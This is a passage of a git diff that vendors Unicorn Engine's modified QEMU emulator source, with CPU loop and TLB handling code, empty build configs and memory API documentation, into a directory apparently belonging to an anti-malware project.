FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +/* Needed early for CONFIG_BSD etc. */ +#include "config-host.h" +#include "sysemu/sysemu.h" +#include "sysemu/cpus.h" +#include "qemu/thread.h" + +#include "exec/address-spaces.h" // debug, can be removed later + +#include "uc_priv.h" + +static bool cpu_can_run(CPUState *cpu); +static void cpu_handle_guest_debug(CPUState *cpu); +static int tcg_cpu_exec(struct uc_struct *uc, CPUArchState *env); +static bool tcg_exec_all(struct uc_struct* uc); +static int qemu_tcg_init_vcpu(CPUState *cpu); +static void qemu_tcg_cpu_loop(struct uc_struct *uc); + +int vm_start(struct uc_struct* uc) +{ + if (resume_all_vcpus(uc)) { + return -1; + } + return 0; +} + +bool cpu_is_stopped(CPUState *cpu) +{ + return cpu->stopped; +} + +void run_on_cpu(CPUState *cpu, void (*func)(void *data), void *data) +{ + func(data); +} + +int resume_all_vcpus(struct uc_struct *uc) +{ + CPUState *cpu = uc->cpu; + // Fix call multiple time (vu). + // We have to check whether this is the second time, then reset all CPU. 
+ if (!cpu->created) { + cpu->created = true; + cpu->halted = 0; + if (qemu_init_vcpu(cpu)) + return -1; + } + + cpu->exit_request = 0; + + //qemu_clock_enable(QEMU_CLOCK_VIRTUAL, true); + cpu_resume(cpu); + qemu_tcg_cpu_loop(uc); + + return 0; +} + +int qemu_init_vcpu(CPUState *cpu) +{ + cpu->nr_cores = smp_cores; + cpu->nr_threads = smp_threads; + cpu->stopped = true; + + if (tcg_enabled(cpu->uc)) + return qemu_tcg_init_vcpu(cpu); + + return 0; +} + +static void qemu_tcg_cpu_loop(struct uc_struct *uc) +{ + CPUState *cpu = uc->cpu; + + //qemu_tcg_init_cpu_signals(); + + cpu->created = true; + + while (1) { + if (tcg_exec_all(uc)) + break; + } + + cpu->created = false; +} + +static int qemu_tcg_init_vcpu(CPUState *cpu) +{ + tcg_cpu_address_space_init(cpu, cpu->as); + + return 0; +} + +static int tcg_cpu_exec(struct uc_struct *uc, CPUArchState *env) +{ + return cpu_exec(uc, env); +} + +static bool tcg_exec_all(struct uc_struct* uc) +{ + int r; + bool finish = false; + while (!uc->exit_request) { + CPUState *cpu = uc->cpu; + CPUArchState *env = cpu->env_ptr; + + //qemu_clock_enable(QEMU_CLOCK_VIRTUAL, + // (cpu->singlestep_enabled & SSTEP_NOTIMER) == 0); + if (cpu_can_run(cpu)) { + uc->quit_request = false; + r = tcg_cpu_exec(uc, env); + + // quit current TB but continue emulating? 
+ if (uc->quit_request) { + // reset stop_request + uc->stop_request = false; + } else if (uc->stop_request) { + //printf(">>> got STOP request!!!\n"); + finish = true; + break; + } + + // save invalid memory access error & quit + if (env->invalid_error) { + // printf(">>> invalid memory accessed, STOP = %u!!!\n", env->invalid_error); + uc->invalid_addr = env->invalid_addr; + uc->invalid_error = env->invalid_error; + finish = true; + break; + } + + // printf(">>> stop with r = %x, HLT=%x\n", r, EXCP_HLT); + if (r == EXCP_DEBUG) { + cpu_handle_guest_debug(cpu); + break; + } + if (r == EXCP_HLT) { + //printf(">>> got HLT!!!\n"); + finish = true; + break; + } + } else if (cpu->stop || cpu->stopped) { + // printf(">>> got stopped!!!\n"); + break; + } + } + uc->exit_request = 0; + + return finish; +} + +static bool cpu_can_run(CPUState *cpu) +{ + if (cpu->stop) { + return false; + } + if (cpu_is_stopped(cpu)) { + return false; + } + return true; +} + +static void cpu_handle_guest_debug(CPUState *cpu) +{ + cpu->stopped = true; +} + +#if 0 +#ifndef _WIN32 +static void qemu_tcg_init_cpu_signals(void) +{ + sigset_t set; + struct sigaction sigact; + + memset(&sigact, 0, sizeof(sigact)); + sigact.sa_handler = cpu_signal; + sigaction(SIG_IPI, &sigact, NULL); + + sigemptyset(&set); + sigaddset(&set, SIG_IPI); + pthread_sigmask(SIG_UNBLOCK, &set, NULL); +} +#else /* _WIN32 */ +static void qemu_tcg_init_cpu_signals(void) +{ +} +#endif /* _WIN32 */ +#endif + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/cputlb.c b/ai_anti_malware/unicorn/unicorn-master/qemu/cputlb.c new file mode 100644 index 0000000..fd0bb80 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/cputlb.c @@ -0,0 +1,426 @@ +/* + * Common CPU TLB handling + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * 
version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ + +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "config.h" +#include "cpu.h" +#include "exec/exec-all.h" +#include "exec/memory.h" +#include "exec/address-spaces.h" +#include "exec/cpu_ldst.h" + +#include "exec/cputlb.h" + +#include "exec/memory-internal.h" +#include "exec/ram_addr.h" +#include "tcg/tcg.h" + +#include "uc_priv.h" + +//#define DEBUG_TLB +//#define DEBUG_TLB_CHECK + +static void tlb_flush_entry(CPUTLBEntry *tlb_entry, target_ulong addr); +static bool tlb_is_dirty_ram(CPUTLBEntry *tlbe); +static bool qemu_ram_addr_from_host_nofail(struct uc_struct *uc, void *ptr, ram_addr_t *addr); +static void tlb_add_large_page(CPUArchState *env, target_ulong vaddr, + target_ulong size); +static void tlb_set_dirty1(CPUTLBEntry *tlb_entry, target_ulong vaddr); + +/* statistics */ +//int tlb_flush_count; + +/* NOTE: + * If flush_global is true (the usual case), flush all tlb entries. + * If flush_global is false, flush (at least) all tlb entries not + * marked global. + * + * Since QEMU doesn't currently implement a global/not-global flag + * for tlb entries, at the moment tlb_flush() will also flush all + * tlb entries in the flush_global == false case. This is OK because + * CPU architectures generally permit an implementation to drop + * entries from the TLB at any time, so flushing more entries than + * required is only an efficiency issue, not a correctness issue. 
+ */ +void tlb_flush(CPUState *cpu, int flush_global) +{ + CPUArchState *env = cpu->env_ptr; + +#if defined(DEBUG_TLB) + printf("tlb_flush:\n"); +#endif + /* must reset current TB so that interrupts cannot modify the + links while we are modifying them */ + cpu->current_tb = NULL; + + memset(env->tlb_table, -1, sizeof(env->tlb_table)); + memset(env->tlb_v_table, -1, sizeof(env->tlb_v_table)); + memset(cpu->tb_jmp_cache, 0, sizeof(cpu->tb_jmp_cache)); + + env->vtlb_index = 0; + env->tlb_flush_addr = -1; + env->tlb_flush_mask = 0; + //tlb_flush_count++; +} + +void tlb_flush_page(CPUState *cpu, target_ulong addr) +{ + CPUArchState *env = cpu->env_ptr; + int i; + int mmu_idx; + +#if defined(DEBUG_TLB) + printf("tlb_flush_page: " TARGET_FMT_lx "\n", addr); +#endif + /* Check if we need to flush due to large pages. */ + if ((addr & env->tlb_flush_mask) == env->tlb_flush_addr) { +#if defined(DEBUG_TLB) + printf("tlb_flush_page: forced full flush (" + TARGET_FMT_lx "/" TARGET_FMT_lx ")\n", + env->tlb_flush_addr, env->tlb_flush_mask); +#endif + tlb_flush(cpu, 1); + return; + } + /* must reset current TB so that interrupts cannot modify the + links while we are modifying them */ + cpu->current_tb = NULL; + + addr &= TARGET_PAGE_MASK; + i = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { + tlb_flush_entry(&env->tlb_table[mmu_idx][i], addr); + } + + /* check whether there are entries that need to be flushed in the vtlb */ + for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { + int k; + for (k = 0; k < CPU_VTLB_SIZE; k++) { + tlb_flush_entry(&env->tlb_v_table[mmu_idx][k], addr); + } + } + + tb_flush_jmp_cache(cpu, addr); +} + +/* update the TLBs so that writes to code in the virtual page 'addr' + can be detected */ +void tlb_protect_code(struct uc_struct *uc, ram_addr_t ram_addr) +{ + cpu_physical_memory_reset_dirty(uc, ram_addr, TARGET_PAGE_SIZE, + DIRTY_MEMORY_CODE); +} + +/* update the TLB so that writes in 
physical page 'phys_addr' are no longer + tested for self modifying code */ +void tlb_unprotect_code_phys(CPUState *cpu, ram_addr_t ram_addr, + target_ulong vaddr) +{ + cpu_physical_memory_set_dirty_flag(cpu->uc, ram_addr, DIRTY_MEMORY_CODE); +} + +void tlb_reset_dirty_range(CPUTLBEntry *tlb_entry, uintptr_t start, + uintptr_t length) +{ + uintptr_t addr; + + if (tlb_is_dirty_ram(tlb_entry)) { + addr = (tlb_entry->addr_write & TARGET_PAGE_MASK) + tlb_entry->addend; + if ((addr - start) < length) { + tlb_entry->addr_write |= TLB_NOTDIRTY; + } + } +} + +void cpu_tlb_reset_dirty_all(struct uc_struct *uc, + ram_addr_t start1, ram_addr_t length) +{ + CPUState *cpu = uc->cpu; + CPUArchState *env; + + int mmu_idx; + + env = cpu->env_ptr; + for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { + unsigned int i; + + for (i = 0; i < CPU_TLB_SIZE; i++) { + tlb_reset_dirty_range(&env->tlb_table[mmu_idx][i], + start1, length); + } + + for (i = 0; i < CPU_VTLB_SIZE; i++) { + tlb_reset_dirty_range(&env->tlb_v_table[mmu_idx][i], + start1, length); + } + } +} + +/* update the TLB corresponding to virtual page vaddr + so that it is no longer dirty */ +void tlb_set_dirty(CPUArchState *env, target_ulong vaddr) +{ + int i; + int mmu_idx; + + vaddr &= TARGET_PAGE_MASK; + i = (vaddr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { + tlb_set_dirty1(&env->tlb_table[mmu_idx][i], vaddr); + } + + for (mmu_idx = 0; mmu_idx < NB_MMU_MODES; mmu_idx++) { + int k; + for (k = 0; k < CPU_VTLB_SIZE; k++) { + tlb_set_dirty1(&env->tlb_v_table[mmu_idx][k], vaddr); + } + } +} + + +/* Add a new TLB entry. At most one entry for a given virtual address + is permitted. Only a single TARGET_PAGE_SIZE region is mapped, the + supplied size is only used by tlb_flush_page. 
*/ +void tlb_set_page(CPUState *cpu, target_ulong vaddr, + hwaddr paddr, int prot, + int mmu_idx, target_ulong size) +{ + CPUArchState *env = cpu->env_ptr; + MemoryRegionSection *section; + unsigned int index; + target_ulong address; + target_ulong code_address; + uintptr_t addend; + CPUTLBEntry *te; + hwaddr iotlb, xlat, sz; + unsigned vidx = env->vtlb_index++ % CPU_VTLB_SIZE; + + assert(size >= TARGET_PAGE_SIZE); + if (size != TARGET_PAGE_SIZE) { + tlb_add_large_page(env, vaddr, size); + } + + sz = size; + section = address_space_translate_for_iotlb(cpu->as, paddr, + &xlat, &sz); + assert(sz >= TARGET_PAGE_SIZE); + +#if defined(DEBUG_TLB) + printf("tlb_set_page: vaddr=" TARGET_FMT_lx " paddr=0x" TARGET_FMT_plx + " prot=%x idx=%d\n", + vaddr, paddr, prot, mmu_idx); +#endif + + address = vaddr; + if (!memory_region_is_ram(section->mr) && !memory_region_is_romd(section->mr)) { + /* IO memory case */ + address |= TLB_MMIO; + addend = 0; + } else { + /* TLB_MMIO for rom/romd handled below */ + addend = (uintptr_t)((char*)memory_region_get_ram_ptr(section->mr) + xlat); + } + + code_address = address; + iotlb = memory_region_section_get_iotlb(cpu, section, vaddr, paddr, xlat, + prot, &address); + + index = (vaddr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + te = &env->tlb_table[mmu_idx][index]; + + /* do not discard the translation in te, evict it into a victim tlb */ + env->tlb_v_table[mmu_idx][vidx] = *te; + env->iotlb_v[mmu_idx][vidx] = env->iotlb[mmu_idx][index]; + + /* refill the tlb */ + env->iotlb[mmu_idx][index] = iotlb - vaddr; + te->addend = (uintptr_t)(addend - vaddr); + if (prot & PAGE_READ) { + te->addr_read = address; + } else { + te->addr_read = -1; + } + + if (prot & PAGE_EXEC) { + te->addr_code = code_address; + } else { + te->addr_code = -1; + } + if (prot & PAGE_WRITE) { + if ((memory_region_is_ram(section->mr) && section->readonly) + || memory_region_is_romd(section->mr)) { + /* Write access calls the I/O callback. 
*/ + te->addr_write = address | TLB_MMIO; + } else if (memory_region_is_ram(section->mr) + && cpu_physical_memory_is_clean(cpu->uc, (ram_addr_t)(section->mr->ram_addr + + xlat))) { + te->addr_write = address | TLB_NOTDIRTY; + } else { + te->addr_write = address; + } + } else { + te->addr_write = -1; + } +} + +/* NOTE: this function can trigger an exception */ +/* NOTE2: the returned address is not exactly the physical address: it + * is actually a ram_addr_t (in system mode; the user mode emulation + * version of this function returns a guest virtual address). + */ +tb_page_addr_t get_page_addr_code(CPUArchState *env1, target_ulong addr) +{ + int mmu_idx, page_index, pd; + void *p; + MemoryRegion *mr; + ram_addr_t ram_addr; + CPUState *cpu = ENV_GET_CPU(env1); + + page_index = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + mmu_idx = cpu_mmu_index(env1); + + if ((mmu_idx < 0) || (mmu_idx >= NB_MMU_MODES)) { + return -1; + } + + if (unlikely(env1->tlb_table[mmu_idx][page_index].addr_code != + (addr & TARGET_PAGE_MASK))) { + cpu_ldub_code(env1, addr); + //check for NX related error from softmmu + if (env1->invalid_error == UC_ERR_FETCH_PROT) { + return -1; + } + } + pd = env1->iotlb[mmu_idx][page_index] & ~TARGET_PAGE_MASK; + mr = iotlb_to_region(cpu->as, pd); + if (memory_region_is_unassigned(cpu->uc, mr)) { + CPUClass *cc = CPU_GET_CLASS(env1->uc, cpu); + + if (cc->do_unassigned_access) { + cc->do_unassigned_access(cpu, addr, false, true, 0, 4); + } else { + //cpu_abort(cpu, "Trying to execute code outside RAM or ROM at 0x" + // TARGET_FMT_lx "\n", addr); // qq + env1->invalid_addr = addr; + env1->invalid_error = UC_ERR_FETCH_UNMAPPED; + return -1; + } + } + p = (void *)((uintptr_t)addr + env1->tlb_table[mmu_idx][page_index].addend); + if (!qemu_ram_addr_from_host_nofail(cpu->uc, p, &ram_addr)) { + env1->invalid_addr = addr; + env1->invalid_error = UC_ERR_FETCH_UNMAPPED; + return -1; + } else + return ram_addr; +} + +static bool 
qemu_ram_addr_from_host_nofail(struct uc_struct *uc, void *ptr, ram_addr_t *ram_addr) +{ + if (qemu_ram_addr_from_host(uc, ptr, ram_addr) == NULL) { + // fprintf(stderr, "Bad ram pointer %p\n", ptr); + return false; + } + + return true; +} + +static void tlb_set_dirty1(CPUTLBEntry *tlb_entry, target_ulong vaddr) +{ + if (tlb_entry->addr_write == (vaddr | TLB_NOTDIRTY)) { + tlb_entry->addr_write = vaddr; + } +} + +/* Our TLB does not support large pages, so remember the area covered by + large pages and trigger a full TLB flush if these are invalidated. */ +static void tlb_add_large_page(CPUArchState *env, target_ulong vaddr, + target_ulong size) +{ + target_ulong mask = ~(size - 1); + + if (env->tlb_flush_addr == (target_ulong)-1) { + env->tlb_flush_addr = vaddr & mask; + env->tlb_flush_mask = mask; + return; + } + /* Extend the existing region to include the new page. + This is a compromise between unnecessary flushes and the cost + of maintaining a full variable size TLB. */ + mask &= env->tlb_flush_mask; + while (((env->tlb_flush_addr ^ vaddr) & mask) != 0) { + mask <<= 1; + } + env->tlb_flush_addr &= mask; + env->tlb_flush_mask = mask; +} + +static bool tlb_is_dirty_ram(CPUTLBEntry *tlbe) +{ + return (tlbe->addr_write & (TLB_INVALID_MASK|TLB_MMIO|TLB_NOTDIRTY)) == 0; +} + + +static void tlb_flush_entry(CPUTLBEntry *tlb_entry, target_ulong addr) +{ + if (addr == (tlb_entry->addr_read & + (TARGET_PAGE_MASK | TLB_INVALID_MASK)) || + addr == (tlb_entry->addr_write & + (TARGET_PAGE_MASK | TLB_INVALID_MASK)) || + addr == (tlb_entry->addr_code & + (TARGET_PAGE_MASK | TLB_INVALID_MASK))) { + memset(tlb_entry, -1, sizeof(*tlb_entry)); + } +} + + +#define MMUSUFFIX _mmu + +#define SHIFT 0 +#include "softmmu_template.h" + +#define SHIFT 1 +#include "softmmu_template.h" + +#define SHIFT 2 +#include "softmmu_template.h" + +#define SHIFT 3 +#include "softmmu_template.h" +#undef MMUSUFFIX + +#define MMUSUFFIX _cmmu +#undef GETPC_ADJ +#define GETPC_ADJ 0 +#undef GETRA +#define 
GETRA() ((uintptr_t)0) +#define SOFTMMU_CODE_ACCESS + +#define SHIFT 0 +#include "softmmu_template.h" + +#define SHIFT 1 +#include "softmmu_template.h" + +#define SHIFT 2 +#include "softmmu_template.h" + +#define SHIFT 3 +#include "softmmu_template.h" diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/aarch64-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/aarch64-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/aarch64eb-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/aarch64eb-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/arm-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/arm-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/armeb-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/armeb-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/m68k-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/m68k-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/mips-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/mips-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/mips64-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/mips64-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/mips64el-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/mips64el-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git 
a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/mipsel-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/mipsel-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/sparc-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/sparc-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/sparc64-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/sparc64-softmmu.mak new file mode 100644 index 0000000..e69de29 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/x86_64-softmmu.mak b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/x86_64-softmmu.mak new file mode 100644 index 0000000..6826a92 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/default-configs/x86_64-softmmu.mak @@ -0,0 +1,3 @@ +# Default configuration for x86_64-softmmu + +CONFIG_APIC=y diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/docs/memory.txt b/ai_anti_malware/unicorn/unicorn-master/qemu/docs/memory.txt new file mode 100644 index 0000000..b12f1f0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/docs/memory.txt @@ -0,0 +1,244 @@ +The memory API +============== + +The memory API models the memory and I/O buses and controllers of a QEMU +machine. It attempts to allow modelling of: + + - ordinary RAM + - memory-mapped I/O (MMIO) + - memory controllers that can dynamically reroute physical memory regions + to different destinations + +The memory model provides support for + + - tracking RAM changes by the guest + - setting up coalesced memory for kvm + - setting up ioeventfd regions for kvm + +Memory is modelled as an acyclic graph of MemoryRegion objects. Sinks +(leaves) are RAM and MMIO regions, while other nodes represent +buses, memory controllers, and memory regions that have been rerouted. 
+ +In addition to MemoryRegion objects, the memory API provides AddressSpace +objects for every root and possibly for intermediate MemoryRegions too. +These represent memory as seen from the CPU or a device's viewpoint. + +Types of regions +---------------- + +There are four types of memory regions (all represented by a single C type +MemoryRegion): + +- RAM: a RAM region is simply a range of host memory that can be made available + to the guest. + +- MMIO: a range of guest memory that is implemented by host callbacks; + each read or write causes a callback to be called on the host. + +- container: a container simply includes other memory regions, each at + a different offset. Containers are useful for grouping several regions + into one unit. For example, a PCI BAR may be composed of a RAM region + and an MMIO region. + + A container's subregions are usually non-overlapping. In some cases it is + useful to have overlapping regions; for example a memory controller that + can overlay a subregion of RAM with MMIO or ROM, or a PCI controller + that does not prevent cards from claiming overlapping BARs. + +- alias: a subsection of another region. Aliases allow a region to be + split apart into discontiguous regions. Examples of uses are memory banks + used when the guest address space is smaller than the amount of RAM + addressed, or a memory controller that splits main memory to expose a "PCI + hole". Aliases may point to any type of region, including other aliases, + but an alias may not point back to itself, directly or indirectly. + +It is valid to add subregions to a region which is not a pure container +(that is, to an MMIO, RAM or ROM region). This means that the region +will act like a container, except that any addresses within the container's +region which are not claimed by any subregion are handled by the +container itself (ie by its MMIO callbacks or RAM backing). 
However +it is generally possible to achieve the same effect with a pure container +one of whose subregions is a low priority "background" region covering +the whole address range; this is often clearer and is preferred. +Subregions cannot be added to an alias region. + +Region names +------------ + +Regions are assigned names by the constructor. For most regions these are +only used for debugging purposes, but RAM regions also use the name to identify +live migration sections. This means that RAM region names need to have ABI +stability. + +Region lifecycle +---------------- + +A region is created by one of the constructor functions (memory_region_init*()) +and attached to an object. It is then destroyed by object_unparent() or simply +when the parent object dies. + +In between, a region can be added to an address space +by using memory_region_add_subregion() and removed using +memory_region_del_subregion(). Destroying the region implicitly +removes the region from the address space. + +Region attributes may be changed at any point; they take effect once +the region becomes exposed to the guest. + +Overlapping regions and priority +-------------------------------- +Usually, regions may not overlap each other; a memory address decodes into +exactly one target. In some cases it is useful to allow regions to overlap, +and sometimes to control which of an overlapping regions is visible to the +guest. This is done with memory_region_add_subregion_overlap(), which +allows the region to overlap any other region in the same container, and +specifies a priority that allows the core to decide which of two regions at +the same address are visible (highest wins). +Priority values are signed, and the default value is zero. This means that +you can use memory_region_add_subregion_overlap() both to specify a region +that must sit 'above' any others (with a positive priority) and also a +background region that sits 'below' others (with a negative priority). 
+ +If the higher priority region in an overlap is a container or alias, then +the lower priority region will appear in any "holes" that the higher priority +region has left by not mapping subregions to that area of its address range. +(This applies recursively -- if the subregions are themselves containers or +aliases that leave holes then the lower priority region will appear in these +holes too.) + +For example, suppose we have a container A of size 0x8000 with two subregions +B and C. B is a container mapped at 0x2000, size 0x4000, priority 1; C is +an MMIO region mapped at 0x0, size 0x6000, priority 2. B currently has two +of its own subregions: D of size 0x1000 at offset 0 and E of size 0x1000 at +offset 0x2000. As a diagram: + + 0 1000 2000 3000 4000 5000 6000 7000 8000 + |------|------|------|------|------|------|------|-------| + A: [ ] + C: [CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC] + B: [ ] + D: [DDDDD] + E: [EEEEE] + +The regions that will be seen within this address range then are: + [CCCCCCCCCCCC][DDDDD][CCCCC][EEEEE][CCCCC] + +Since B has higher priority than C, its subregions appear in the flat map +even where they overlap with C. In ranges where B has not mapped anything +C's region appears. + +If B had provided its own MMIO operations (ie it was not a pure container) +then these would be used for any addresses in its range not handled by +D or E, and the result would be: + [CCCCCCCCCCCC][DDDDD][BBBBB][EEEEE][BBBBB] + +Priority values are local to a container, because the priorities of two +regions are only compared when they are both children of the same container. +This means that the device in charge of the container (typically modelling +a bus or a memory controller) can use them to manage the interaction of +its child regions without any side effects on other parts of the system. +In the example above, the priorities of D and E are unimportant because +they do not overlap each other. 
It is the relative priority of B and C +that causes D and E to appear on top of C: D and E's priorities are never +compared against the priority of C. + +Visibility +---------- +The memory core uses the following rules to select a memory region when the +guest accesses an address: + +- all direct subregions of the root region are matched against the address, in + descending priority order + - if the address lies outside the region offset/size, the subregion is + discarded + - if the subregion is a leaf (RAM or MMIO), the search terminates, returning + this leaf region + - if the subregion is a container, the same algorithm is used within the + subregion (after the address is adjusted by the subregion offset) + - if the subregion is an alias, the search is continued at the alias target + (after the address is adjusted by the subregion offset and alias offset) + - if a recursive search within a container or alias subregion does not + find a match (because of a "hole" in the container's coverage of its + address range), then if this is a container with its own MMIO or RAM + backing the search terminates, returning the container itself. 
Otherwise + we continue with the next subregion in priority order +- if none of the subregions match the address then the search terminates + with no match found + +Example memory map +------------------ + +system_memory: container@0-2^48-1 + | + +---- lomem: alias@0-0xdfffffff ---> #ram (0-0xdfffffff) + | + +---- himem: alias@0x100000000-0x11fffffff ---> #ram (0xe0000000-0xffffffff) + | + +---- vga-window: alias@0xa0000-0xbffff ---> #pci (0xa0000-0xbffff) + | (prio 1) + | + +---- pci-hole: alias@0xe0000000-0xffffffff ---> #pci (0xe0000000-0xffffffff) + +pci (0-2^32-1) + | + +--- vga-area: container@0xa0000-0xbffff + | | + | +--- alias@0x00000-0x7fff ---> #vram (0x010000-0x017fff) + | | + | +--- alias@0x08000-0xffff ---> #vram (0x020000-0x027fff) + | + +---- vram: ram@0xe1000000-0xe1ffffff + | + +---- vga-mmio: mmio@0xe2000000-0xe200ffff + +ram: ram@0x00000000-0xffffffff + +This is a (simplified) PC memory map. The 4GB RAM block is mapped into the +system address space via two aliases: "lomem" is a 1:1 mapping of the first +3.5GB; "himem" maps the last 0.5GB at address 4GB. This leaves 0.5GB for the +so-called PCI hole, that allows a 32-bit PCI bus to exist in a system with +4GB of memory. + +The memory controller diverts addresses in the range 640K-768K to the PCI +address space. This is modelled using the "vga-window" alias, mapped at a +higher priority so it obscures the RAM at the same addresses. The vga window +can be removed by programming the memory controller; this is modelled by +removing the alias and exposing the RAM underneath. + +The pci address space is not a direct child of the system address space, since +we only want parts of it to be visible (we accomplish this using aliases). +It has two subregions: vga-area models the legacy vga window and is occupied +by two 32K memory banks pointing at two sections of the framebuffer. 
+In addition the vram is mapped as a BAR at address e1000000, and an additional +BAR containing MMIO registers is mapped after it. + +Note that if the guest maps a BAR outside the PCI hole, it would not be +visible as the pci-hole alias clips it to a 0.5GB range. + +Attributes +---------- + +Various region attributes (read-only, dirty logging, coalesced mmio, ioeventfd) +can be changed during the region lifecycle. They take effect once the region +is made visible (which can be immediately, later, or never). + +MMIO Operations +--------------- + +MMIO regions are provided with ->read() and ->write() callbacks; in addition +various constraints can be supplied to control how these callbacks are called: + + - .valid.min_access_size, .valid.max_access_size define the access sizes + (in bytes) which the device accepts; accesses outside this range will + have device and bus specific behaviour (ignored, or machine check) + - .valid.aligned specifies that the device only accepts naturally aligned + accesses. Unaligned accesses invoke device and bus specific behaviour. + - .impl.min_access_size, .impl.max_access_size define the access sizes + (in bytes) supported by the *implementation*; other access sizes will be + emulated using the ones available. For example a 4-byte write will be + emulated using four 1-byte writes, if .impl.max_access_size = 1. + - .impl.unaligned specifies that the *implementation* supports unaligned + accesses; if false, unaligned accesses will be emulated by two aligned + accesses. + - .old_mmio can be used to ease porting from code using + cpu_register_io_memory(). It should not be used in new code. 
diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/exec.c b/ai_anti_malware/unicorn/unicorn-master/qemu/exec.c new file mode 100644 index 0000000..9e4fa5d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/exec.c @@ -0,0 +1,2347 @@ +/* + * Virtual page mapping + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "config.h" +#ifndef _WIN32 +#include <sys/types.h> +#include <sys/mman.h> +#endif + +#include "qemu-common.h" +#include "cpu.h" +#include "tcg.h" +#include "hw/hw.h" +#include "hw/qdev.h" +#include "qemu/osdep.h" +#include "sysemu/sysemu.h" +#include "qemu/timer.h" +#include "exec/memory.h" +#include "exec/address-spaces.h" +#if defined(CONFIG_USER_ONLY) +#include <qemu.h> +#endif +#include "exec/cpu-all.h" + +#include "exec/cputlb.h" +#include "translate-all.h" + +#include "exec/memory-internal.h" +#include "exec/ram_addr.h" + +#include "qemu/range.h" + +#include "uc_priv.h" + +//#define DEBUG_SUBPAGE + +#if !defined(CONFIG_USER_ONLY) + +/* RAM is pre-allocated and passed into qemu_ram_alloc_from_ptr */ +#define RAM_PREALLOC (1 << 0) + +/* RAM is mmap-ed with MAP_SHARED */ +#define RAM_SHARED (1 << 1) + +#endif + +#if !defined(CONFIG_USER_ONLY) +/* current CPU in the current thread. 
